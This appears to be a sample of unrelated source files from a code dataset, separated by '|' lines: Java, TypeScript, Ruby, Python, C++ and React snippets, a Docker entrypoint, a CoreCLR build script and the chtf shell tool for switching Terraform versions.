    public static final DamageSource NO_WATER_FOR_GILLS = new DamageSource("no_water_for_gills").setBypassesArmor().setUnblockable();
    // Generic damage-over-time source; exact users not visible here.
    public static final DamageSource GENERIC_DOT = new DamageSource("genericDamageOverTime").setBypassesArmor().setUnblockable();
}
|
package ru.skarpushin.swingpm.base;
import javax.swing.JComponent;
/**
 * Implemented by views/presenters that expose a single Swing root
 * component which a parent container can embed.
 */
public interface HasRootComponent {
    /** @return the top-level Swing component of this view */
    JComponent getRootComponent();
}
|
#!/bin/bash

# Stream task updates from the service; HOST/PORT may be overridden
# from the environment.
HOST=${HOST:-localhost}
PORT=${PORT:-9101}

# The URL must be quoted: the unquoted '?' in '?watch' is a glob
# character and the word would be subject to pathname expansion.
curl "http://${HOST}:${PORT}/v1/tasks?watch"
import { IsDefined, MaxLength } from 'class-validator';
import { Field, InputType } from '@nestjs/graphql';
/** GraphQL input type for the login mutation. */
@InputType()
export class LoginUserInput {
  // Required; capped at 15 characters (presumably the DB column size —
  // TODO confirm).
  @Field()
  @IsDefined()
  @MaxLength(15)
  username: string;

  // Required; same 15-character cap as username.
  @Field()
  @IsDefined()
  @MaxLength(15)
  password: string;
}
|
<gh_stars>10-100
package com.createchance.imageeditor.shaders;
import android.opengl.GLES20;
/**
 * RGB channel adjust fragment shader.
 *
 * Wraps the GLSL program in assets ("RGBAdjustFragmentShader.glsl") and
 * exposes typed setters for its uniforms (input texture and per-channel
 * red/green/blue factors).
 *
 * @author createchance
 * @date 2018/11/25
 */
public class RGBAdjustFragmentShader extends AbstractShader {

    private static final String TAG = "RGBAdjustFragmentShader";

    // Shader asset and the uniform names it declares.
    private final String FRAGMENT_SHADER = "RGBAdjustFragmentShader.glsl";
    private final String U_INPUT_TEXTURE = "u_InputTexture";
    private final String U_RED = "u_Red";
    private final String U_GREEN = "u_Green";
    private final String U_BLUE = "u_Blue";

    // Uniform locations; resolved once per program in initLocation().
    private int mUInputTexture, mURed, mUGreen, mUBlue;

    public RGBAdjustFragmentShader() {
        initShader(FRAGMENT_SHADER, GLES20.GL_FRAGMENT_SHADER);
    }

    /** Look up the uniform locations for the linked program. */
    @Override
    public void initLocation(int programId) {
        mUInputTexture = GLES20.glGetUniformLocation(programId, U_INPUT_TEXTURE);
        mURed = GLES20.glGetUniformLocation(programId, U_RED);
        mUGreen = GLES20.glGetUniformLocation(programId, U_GREEN);
        mUBlue = GLES20.glGetUniformLocation(programId, U_BLUE);
    }

    /**
     * Bind {@code textureId} on the given texture unit and point the
     * sampler uniform at it.
     *
     * @param textureTarget a texture-unit enum (GLES20.GL_TEXTUREn), not a
     *                      binding target such as GL_TEXTURE_2D
     * @param textureId     the texture object to bind
     */
    public void setUInputTexture(int textureTarget, int textureId) {
        // bind texture
        GLES20.glActiveTexture(textureTarget);
        GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId);
        // Sampler uniforms take the unit *index*, hence the GL_TEXTURE0 offset.
        GLES20.glUniform1i(mUInputTexture, textureTarget - GLES20.GL_TEXTURE0);
    }

    /** Set the red channel multiplier. */
    public void setURed(float red) {
        GLES20.glUniform1f(mURed, red);
    }

    /** Set the green channel multiplier. */
    public void setUGreen(float green) {
        GLES20.glUniform1f(mUGreen, green);
    }

    /** Set the blue channel multiplier. */
    public void setUBlue(float blue) {
        GLES20.glUniform1f(mUBlue, blue);
    }
}
|
# Creates the stories table: textual metadata (title, description,
# transcript), media references (visual_content, audio) and the owning
# user (user_id).
class CreateStories < ActiveRecord::Migration
  def change
    create_table :stories do |t|
      t.string :title
      t.string :description
      t.string :visual_content
      # NOTE(review): plain integer FK, no index or constraint — confirm
      # whether an index on user_id is wanted.
      t.integer :user_id
      t.string :audio
      t.string :transcript
    end
  end
end
|
import requests

# Define the search query; 'q' is the API's query-string parameter.
query = {"q": "WebSearch API"}  # was "WebSearh" (typo)

# Call the search API. The original URL was garbled ("ยงยง.example.com"
# with no scheme) and would make requests raise MissingSchema.
r = requests.get(url="https://www.example.com/search-api", params=query)

# Parse the JSON body.
results = r.json()

# Parse and process results. Assumes the API returns a JSON array of
# objects with "title" and "url" keys -- TODO confirm with the real API.
for result in results:
    title = result["title"]
    url = result["url"]
    # Processes title and url
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2009 <NAME> All rights reserved.
#
"""Print the metadata (name, mtime, mode, type, size) of every member of
'example.tar'.

Python 2 only: uses print statements.
"""
__version__ = "$Id$"
#end_pymotw_header

import tarfile
import time
from contextlib import closing

# closing() guarantees the archive is closed even if iteration fails.
with closing(tarfile.open('example.tar', 'r')) as t:
    for member_info in t.getmembers():
        print member_info.name
        print '\tModified:\t', time.ctime(member_info.mtime)
        print '\tMode :\t', oct(member_info.mode)
        print '\tType :\t', member_info.type
        print '\tSize :\t', member_info.size, 'bytes'
        print
|
#! /bin/bash
set -e

# Default container command ("java ..."): fix ownership of the appdata
# volume (bind mounts may arrive root-owned) and drop privileges to the
# mirth user via gosu before exec'ing.
if [ "$1" = 'java' ]; then
    chown -R mirth /opt/mirth-connect/appdata
    exec gosu mirth "$@"
fi

# Any other command (e.g. a debugging shell) runs unmodified.
exec "$@"
//
// Created by ooooo on 2020/2/14.
//
#ifndef CPP_0078__SOLUTION1_H_
#define CPP_0078__SOLUTION1_H_
#include <iostream>
#include <vector>
using namespace std;
/**
 * Backtracking (回溯): enumerate subsets of every size.
 */
class Solution {
  public:
    // Depth-first backtracking: extend the partial subset `num` with
    // elements starting at `index` until it reaches size `count`, then
    // record it in `ans`.
    void dfs(int cur_count, int count, int index) {
        if (cur_count == count) {
            ans.push_back(num);
            return;
        }
        // NOTE(review): `i < nums.size()` compares int to size_t; fine for
        // LeetCode-sized inputs but triggers sign-compare warnings.
        for (int i = index; i < nums.size(); ++i) {
            num.push_back(nums[i]);
            dfs(cur_count + 1, count, i + 1);
            num.pop_back();  // undo choice before trying the next element
        }
    }
    vector<vector<int>> ans;   // all subsets collected so far
    vector<int> nums, num;     // input copy / current partial subset
    // Return all subsets of `nums`, grouped by ascending size (size 0..n).
    vector<vector<int>> subsets(vector<int> &nums) {
        this->nums = nums;
        for (int i = 0; i <= nums.size(); ++i) {
            num.clear();
            dfs(0, i, 0);
        }
        return ans;
    }
};
#endif //CPP_0078__SOLUTION1_H_
|
import React from "react"
const SiteFooterLink = ({linkText, linkPath, newTab}) => (
<li className="c-site-footer__list-item">
<a
href={linkPath}
className="c-site-footer__link"
target={newTab ? '_blank' : ''}
rel="noopener noreferrer"
>
{ linkText }
</a>
</li>
)
export default SiteFooterLink
|
#!/bin/bash

# Generate config.h from the KConfig-style ".config" file: every
# CONFIG_*=value line becomes "#define CONFIG_* value", wrapped in an
# include guard.
#
# Fixes over the previous version: the whole pipeline was wrapped in
# `$(...)`, which executed its (empty) stdout as a command; and
# `cut -d"=" -f2` truncated values that themselves contain '='.

{
    echo '#ifndef __CONFIG_H__'
    echo '#define __CONFIG_H__'
    while read -r line; do
        # Only lines starting with "CONFIG_" (match length 7) are entries.
        if [[ $(expr "$line" : "CONFIG_") -ne 7 ]]; then
            continue
        fi
        name=${line%%=*}
        # Keep everything after the first '=' so values may contain '='.
        value=${line#*=}
        echo "#define $name $value"
    done < ".config"
    echo '#endif /* __CONFIG_H__ */'
} > config.h
|
<reponame>vharsh/cattle2<gh_stars>0
package io.cattle.platform.lock;
/**
 * Callback executed while a lock is held, allowing a checked exception
 * of type {@code E} to propagate to the caller.
 *
 * @param <T> result type returned from the locked section
 * @param <E> checked exception type the callback may throw
 */
public interface LockCallbackWithException<T, E extends Throwable> {
    /** Runs the guarded work; invoked only while the lock is held. */
    T doWithLock() throws E;
}
|
// SPDX-License-Identifier: Apache-2.0
// YAPION
// Copyright (C) 2019,2020 yoyosource
package yapion.serializing.api;
import yapion.annotations.deserialize.YAPIONLoadExclude;
import yapion.annotations.serialize.YAPIONSaveExclude;
import yapion.serializing.SerializeManager;
import java.util.Queue;
@YAPIONSaveExclude(context = "*")
@YAPIONLoadExclude(context = "*")
@SuppressWarnings({"java:S1610"})
public abstract class SerializerQueue<T extends Queue<?>> implements SerializerQueueInterface<T> {

    /**
     * Add this SerializerQueue to the SerializeManager by calling
     * {@link SerializeManager#add(SerializerQueueInterface)}.
     */
    public final void add() {
        SerializeManager.add(this);
    }
}
def process_dhcp_client(session, module, present):
    """Ensure the device's DHCP client entry matches the module params.

    Returns an Ansible-style result dict with 'changed' and 'result'.

    NOTE(review): the `elif present` branch re-posts the client even when
    the current entry already matches, without setting 'changed' — confirm
    whether that is intentional (idempotence looks broken).
    NOTE(review): `module` is read both as a mapping (module['name']) and
    as an object (module.check_mode) — confirm the expected type.
    """
    result = {'changed': False, 'result': ''}
    current = session.get_dhcp_client_info() # Assume a method to retrieve current DHCP client information
    # Entry exists but differs from the desired state: replace it.
    if present and (current['name'] != module['name']
                    or current['ipAddress'] != module['ip']
                    or current['mac'] != module['mac']):
        if not module.check_mode:
            session.del_dhcp_client(current['id']) # Assume a method to delete DHCP client
            result['result'] = session.post_dhcp_client(module['name'], module['ip'], module['mac'], True) # Assume a method to add/update DHCP client
        result['changed'] = True
    elif present:
        if not module.check_mode:
            result['result'] = session.post_dhcp_client(module['name'], module['ip'], module['mac'], True) # Assume a method to add/update DHCP client
    return result
#!/usr/bin/env bash

# resolve python-version to use: honour $PYTHON if set, otherwise take
# the first interpreter found on PATH.
if [[ -z "$PYTHON" ]]; then
    if ! PYTHON=$(command -v python3 || command -v python2 || command -v python || command -v py)
    then
        echo "Unable to locate build-dependency python!" 1>&2
        exit 1
    fi
fi

# validate python-dependency
# useful in case of explicitly set option.
if ! command -v "$PYTHON" > /dev/null
then
    echo "Unable to locate build-dependency python ($PYTHON)!" 1>&2
    exit 1
fi

export PYTHON

# Extra usage lines shown by the shared argument parser in _build-commons.sh.
usage_list+=("-nopgooptimize: do not use profile guided optimizations.")
usage_list+=("-pgoinstrument: generate instrumented code for profile guided optimization enabled binaries.")
usage_list+=("-skipcrossarchnative: Skip building cross-architecture native binaries.")
usage_list+=("-staticanalyzer: use scan_build static analyzer.")
usage_list+=("-component: Build individual components instead of the full project. Available options are 'jit', 'runtime', 'paltests', 'alljits', and 'iltools'. Can be specified multiple times.")
# Create build output directories: the shared ones (setup_dirs from
# _build-commons.sh) plus log dirs and, when cross-building, the
# cross-component bin dir.
setup_dirs_local()
{
    setup_dirs

    mkdir -p "$__LogsDir"
    mkdir -p "$__MsbuildDebugLogsDir"

    if [[ "$__CrossBuild" == 1 ]]; then
        mkdir -p "$__CrossComponentBinDir"
    fi
}
# Restore the PGO optimization-data package (when PGO is enabled and
# msbuild runs on .NET Core) and capture its on-disk path into
# __PgoOptDataPath for CMake.
restore_optdata()
{
    local OptDataProjectFilePath="$__ProjectRoot/.nuget/optdata/optdata.csproj"
    if [[ "$__PgoOptimize" == 1 && "$__IsMSBuildOnNETCoreSupported" == 1 ]]; then
        # Parse the optdata package versions out of msbuild so that we can pass them on to CMake
        local PgoDataPackagePathOutputFile="${__IntermediatesDir}/optdatapath.txt"
        local RestoreArg=""
        if [[ "$__SkipRestoreOptData" == "0" ]]; then
            RestoreArg="/restore"
        fi

        # Writes into ${PgoDataPackagePathOutputFile}
        "$__RepoRootDir/eng/common/msbuild.sh" /clp:nosummary $__ArcadeScriptArgs $OptDataProjectFilePath $RestoreArg /t:DumpPgoDataPackagePath \
            ${__CommonMSBuildArgs} /p:PgoDataPackagePathOutputFile=${PgoDataPackagePathOutputFile} \
            -bl:"$__LogsDir/PgoVersionRead_$__ConfigTriplet.binlog" > /dev/null 2>&1
        local exit_code="$?"
        if [[ "$exit_code" != 0 || ! -f "${PgoDataPackagePathOutputFile}" ]]; then
            echo "${__ErrMsgPrefix}Failed to get PGO data package path."
            # Previously this could `exit 0`: msbuild may succeed while the
            # output file is still missing. Force a non-zero exit so CI and
            # callers see the failure.
            if [[ "$exit_code" == 0 ]]; then
                exit_code=1
            fi
            exit "$exit_code"
        fi

        __PgoOptDataPath=$(<"${PgoDataPackagePathOutputFile}")
    fi
}
# Build the host-architecture tools (e.g. crossgen) needed when the
# target architecture differs from the host. Only supported for a few
# host/target pairs; silently returns for unsupported combinations.
build_cross_architecture_components()
{
    local intermediatesForBuild="$__IntermediatesDir/Host$__CrossArch/crossgen"
    local crossArchBinDir="$__BinDir/$__CrossArch"

    mkdir -p "$intermediatesForBuild"
    mkdir -p "$crossArchBinDir"

    __SkipCrossArchBuild=1
    # check supported cross-architecture components host(__HostArch)/target(__BuildArch) pair
    if [[ ("$__BuildArch" == "arm" || "$__BuildArch" == "armel") && ("$__CrossArch" == "x86" || "$__CrossArch" == "x64") ]]; then
        __SkipCrossArchBuild=0
    elif [[ "$__BuildArch" == "arm64" && "$__CrossArch" == "x64" ]]; then
        __SkipCrossArchBuild=0
    else
        # not supported
        return
    fi

    # Build for the host arch: temporarily disable cross-compilation and
    # redirect the CMake output dir, then restore CROSSCOMPILE.
    __CMakeBinDir="$crossArchBinDir"
    CROSSCOMPILE=0
    export __CMakeBinDir CROSSCOMPILE

    __CMakeArgs="-DCLR_CMAKE_TARGET_ARCH=$__BuildArch -DCLR_CROSS_COMPONENTS_BUILD=1 $__CMakeArgs"
    build_native "$__TargetOS" "$__CrossArch" "$__ProjectRoot" "$intermediatesForBuild" "crosscomponents" "$__CMakeArgs" "cross-architecture components"

    CROSSCOMPILE=1
    export CROSSCOMPILE
}
# Repo-specific argument handler invoked by the shared parser in
# _build-commons.sh for each CLI token; unknown tokens are forwarded via
# __UnprocessedBuildArgs. Setting __ShiftArgs=1 consumes the next token.
handle_arguments_local() {
    case "$1" in

        nopgooptimize|-nopgooptimize)
            __PgoOptimize=0
            __SkipRestoreOptData=1
            ;;

        pgoinstrument|-pgoinstrument)
            __PgoInstrument=1
            ;;

        skipcrossarchnative|-skipcrossarchnative)
            __SkipCrossArchNative=1
            ;;

        staticanalyzer|-staticanalyzer)
            __StaticAnalyzer=1
            ;;

        component|-component)
            # Accumulates; may be passed multiple times.
            __RequestedBuildComponents="$__RequestedBuildComponents $2"
            __ShiftArgs=1
            ;;

        *)
            __UnprocessedBuildArgs="$__UnprocessedBuildArgs $1"
            ;;
    esac
}
echo "Commencing CoreCLR Repo build"

# Argument types supported by this script:
#
# Build architecture - valid values are: x64, ARM.
# Build Type - valid values are: Debug, Checked, Release
#
# Set the default arguments for build

# Obtain the location of the bash script to figure out where the root of the repo is.
__ProjectRoot="$(cd "$(dirname "$0")"; pwd -P)"
__RepoRootDir="$(cd "$__ProjectRoot"/../..; pwd -P)"

__BuildArch=
__BuildType=Debug
__CodeCoverage=0

# Set the various build properties here so that CMake and MSBuild can pick them up
__Compiler=clang
__CompilerMajorVersion=
__CompilerMinorVersion=
__CommonMSBuildArgs=
__ConfigureOnly=0
__CrossBuild=0
__DistroRid=""
__PgoInstrument=0
__PgoOptDataPath=""
__PgoOptimize=1
__PortableBuild=1
__ProjectDir="$__ProjectRoot"
__RootBinDir="$__RepoRootDir/artifacts"
__SignTypeArg=""
__SkipConfigure=0
__SkipNative=0
__SkipCrossArchNative=0
__SkipGenerateVersion=0
__SkipManaged=0
__SkipRestore=""
__SkipRestoreOptData=0
__SourceDir="$__ProjectDir/src"
__StaticAnalyzer=0
__UnprocessedBuildArgs=
__UseNinja=0
__VerboseBuild=0
__CMakeArgs=""
__RequestedBuildComponents=""

# Shared helpers: argument parsing (calls handle_arguments_local above),
# setup_dirs, check_prereqs, build_native, etc.
source "$__ProjectRoot"/_build-commons.sh

# Set dependent variables

# Set the remaining variables based upon the determined build configuration
__LogsDir="$__RootBinDir/log/$__BuildType"
__MsbuildDebugLogsDir="$__LogsDir/MsbuildDebugLogs"
__ConfigTriplet="$__TargetOS.$__BuildArch.$__BuildType"
__BinDir="$__RootBinDir/bin/coreclr/$__ConfigTriplet"
__ArtifactsIntermediatesDir="$__RepoRootDir/artifacts/obj/coreclr"
__IntermediatesDir="$__ArtifactsIntermediatesDir/$__ConfigTriplet"
export __IntermediatesDir __ArtifactsIntermediatesDir
__CrossComponentBinDir="$__BinDir"

__CrossArch="$__HostArch"
if [[ "$__CrossBuild" == 1 ]]; then
    __CrossComponentBinDir="$__CrossComponentBinDir/$__CrossArch"
fi

# CI_SPECIFIC - On CI machines, $HOME may not be set. In such a case, create a subfolder and set the variable to set.
# This is needed by CLI to function.
if [[ -z "$HOME" ]]; then
    if [[ ! -d "$__ProjectDir/temp_home" ]]; then
        mkdir temp_home
    fi
    HOME="$__ProjectDir"/temp_home
    export HOME
    echo "HOME not defined; setting it to $HOME"
fi

# Specify path to be set for CMAKE_INSTALL_PREFIX.
# This is where all built CoreClr libraries will copied to.
__CMakeBinDir="$__BinDir"
export __CMakeBinDir

# Make the directories necessary for build if they don't exist
setup_dirs_local

# Set up the directory for MSBuild debug logs.
MSBUILDDEBUGPATH="${__MsbuildDebugLogsDir}"
export MSBUILDDEBUGPATH

# Check prereqs.
check_prereqs

# Restore the package containing profile counts for profile-guided optimizations
restore_optdata

# Build the coreclr (native) components.
__CMakeArgs="-DCLR_CMAKE_PGO_INSTRUMENT=$__PgoInstrument -DCLR_CMAKE_OPTDATA_PATH=$__PgoOptDataPath -DCLR_CMAKE_PGO_OPTIMIZE=$__PgoOptimize $__CMakeArgs"
if [[ "$__SkipConfigure" == 0 && "$__CodeCoverage" == 1 ]]; then
    __CMakeArgs="-DCLR_CMAKE_ENABLE_CODE_COVERAGE=1 $__CMakeArgs"
fi

# Translate requested components into CMake targets; 'paltests' maps to
# the 'paltests_install' target. Default is a full 'install'.
__CMakeTarget=""
if [[ -n "$__RequestedBuildComponents" ]]; then
    __CMakeTarget=" $__RequestedBuildComponents "
    __CMakeTarget="${__CMakeTarget// paltests / paltests_install }"
fi
if [[ -z "$__CMakeTarget" ]]; then
    __CMakeTarget="install"
fi

if [[ "$__SkipNative" == 1 ]]; then
    echo "Skipping CoreCLR component build."
else
    build_native "$__TargetOS" "$__BuildArch" "$__ProjectRoot" "$__IntermediatesDir" "$__CMakeTarget" "$__CMakeArgs" "CoreCLR component"

    # Build cross-architecture components
    if [[ "$__SkipCrossArchNative" != 1 ]]; then
        if [[ "$__CrossBuild" == 1 ]]; then
            build_cross_architecture_components
        fi
    fi
fi

# Build complete

echo "Repo successfully built."
echo "Product binaries are available at $__BinDir"
exit 0
|
# Copyright (c) 2012-2016 Hal Brodigan
# Copyright (c) 2016-2018 Yleisradio Oy
# Copyright (c) 2020 Teemu Matilainen
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# 'Software'), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CHTF_VERSION='2.1.1-dev'

# Set defaults (`: "${VAR:=value}"` assigns only if VAR is unset/empty).
: "${CHTF_AUTO_INSTALL:=ask}"

# Resolve where Terraform versions live; prefer the Homebrew caskroom
# when the yleisradio/terraforms tap is installed or explicitly chosen.
if [[ -z "$CHTF_TERRAFORM_DIR" ]]; then
    if [[ "$CHTF_AUTO_INSTALL_METHOD" == 'homebrew' ]]; then
        CHTF_TERRAFORM_DIR="$(brew --caskroom)"
    elif [[ -z "$CHTF_AUTO_INSTALL_METHOD" ]] &&
        command -v brew >/dev/null &&
        [[ -d "$(brew --repo)/Library/Taps/yleisradio/homebrew-terraforms" ]]; then
        # https://github.com/Yleisradio/homebrew-terraforms in use
        CHTF_TERRAFORM_DIR="$(brew --caskroom)"
        CHTF_AUTO_INSTALL_METHOD='homebrew'
    else
        CHTF_TERRAFORM_DIR="$HOME/.terraforms"
    fi
fi

: "${CHTF_AUTO_INSTALL_METHOD:=zip}"
# Entry point: `chtf` lists versions, `chtf system` restores the system
# Terraform, `chtf <version>` switches to (and may install) a version.
chtf() {
    case "$1" in
        -h|--help)
            echo "usage: chtf [<version> | system]"
            ;;
        -V|--version)
            echo "chtf: $CHTF_VERSION"
            ;;
        "")
            _chtf_list
            ;;
        system)
            _chtf_reset
            ;;
        *)
            _chtf_use "$1"
            ;;
    esac
}
# Remove the currently selected Terraform from PATH and clear the
# CHTF_CURRENT* state. No-op when nothing is selected.
_chtf_reset() {
    [[ -z "$CHTF_CURRENT" ]] && return 0

    # Pad PATH with ':' so the entry matches anywhere, strip it, then
    # trim the padding again.
    PATH=":$PATH:"; PATH="${PATH//:$CHTF_CURRENT:/:}"
    PATH="${PATH#:}"; PATH="${PATH%:}"
    hash -r

    unset CHTF_CURRENT
    unset CHTF_CURRENT_TERRAFORM_VERSION
}

# Activate the given Terraform version, installing it on demand, and
# prepend its directory to PATH.
_chtf_use() {
    local tf_version="$1"
    local tf_path="$CHTF_TERRAFORM_DIR/terraform-$tf_version"

    # Homebrew adds a subdir named by the package version, so we test also that
    if [[ ! -x "$tf_path/terraform" && ! -x "$tf_path/$tf_version/terraform" ]]; then
        _chtf_install "$tf_version" || return 1
    fi

    if [[ -x "$tf_path/$tf_version/terraform" ]]; then
        tf_path="$tf_path/$tf_version"
    elif [[ ! -x "$tf_path/terraform" ]]; then
        echo "chtf: Failed to find terraform executable in $tf_path" >&2
        return 1
    fi

    _chtf_reset
    export CHTF_CURRENT="$tf_path"
    export CHTF_CURRENT_TERRAFORM_VERSION="$tf_version"
    export PATH="$CHTF_CURRENT:$PATH"
}
# Print every installed Terraform version, marking the active one.
# Runs in a subshell `( ... )` so the glob-option tweaks don't leak.
_chtf_list() (
    # Avoid glob matching errors.
    # Note that we do this in a subshell to restrict the scope.
    # bash
    shopt -s nullglob 2>/dev/null || true
    # zsh
    setopt null_glob 2>/dev/null || true

    for tf_path in "$CHTF_TERRAFORM_DIR"/terraform-*; do
        local tf_version="${tf_path##*/terraform-}"

        # Homebrew layout keeps the binary one level deeper.
        if [[ -x "$tf_path/$tf_version/terraform" ]]; then
            tf_path="$tf_path/$tf_version"
        elif [[ ! -x "$tf_path/terraform" ]]; then
            continue
        fi

        printf '%s %s\n' "$(_chtf_list_prefix "$tf_path")" "$tf_version"
    done;
)

# Emit ' *' for the active version, matching-width spaces otherwise.
_chtf_list_prefix() {
    local tf_path="$1"

    if [[ "$tf_path" == "$CHTF_CURRENT" ]]; then
        printf ' *'
    else
        printf '  '
    fi
}
# Install a missing Terraform version using the configured method
# (dispatched to _chtf_install_<method>), after user confirmation.
_chtf_install() {
    local tf_version="$1"

    echo "chtf: Terraform version $tf_version not found" >&2

    local install_function="_chtf_install_$CHTF_AUTO_INSTALL_METHOD"
    if ! command -v "$install_function" >/dev/null; then
        echo "chtf: Unknown install method: $CHTF_AUTO_INSTALL_METHOD" >&2
        return 1
    fi

    _chtf_confirm "$tf_version" || return 1

    echo "chtf: Installing Terraform version $tf_version"
    $install_function "$tf_version"
}

# Install via the Homebrew terraforms tap.
# NOTE(review): `brew cask install` was removed in newer Homebrew
# (`brew install --cask`) — confirm against supported brew versions.
_chtf_install_homebrew() {
    local tf_version="$1"
    brew cask install "terraform-$tf_version"
}

# Install from the official release zip via the bundled helper script.
_chtf_install_zip() {
    local tf_version="$1"
    local tf_dir="$CHTF_TERRAFORM_DIR/terraform-$tf_version"

    mkdir -p "$tf_dir"
    env TF_INSTALL_DIR="$tf_dir" "$(_chtf_root_dir)"/__chtf_terraform-install.sh -i "$tf_version"
}
# Ask the user whether to auto-install, honouring CHTF_AUTO_INSTALL
# (no/false/0 = never, ask = prompt, anything else = yes).
_chtf_confirm() {
    case "$CHTF_AUTO_INSTALL" in
        no|false|0)
            return 1;;
        ask)
            printf 'chtf: Do you want to install it? [yN] '
            # Single-keystroke read; flag differs between zsh and bash.
            if [[ -n "$ZSH_NAME" ]]; then
                # shellcheck disable=SC2162 # ignore zsh command
                read -k reply
            else
                read -n 1 -r reply
            fi
            echo
            [[ "$reply" == [Yy] ]] || return 1
            ;;
    esac
}

# Directory containing this sourced script (shell-specific lookup; zsh
# has no BASH_SOURCE, so use the %x prompt expansion).
_chtf_root_dir() {
    if [[ -n "$BASH" ]]; then
        dirname "${BASH_SOURCE[0]}"
    elif [[ -n "$ZSH_NAME" ]]; then
        dirname "${(%):-%x}"
    else
        echo 'chtf: [WARN] Unknown shell' >&2
    fi
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.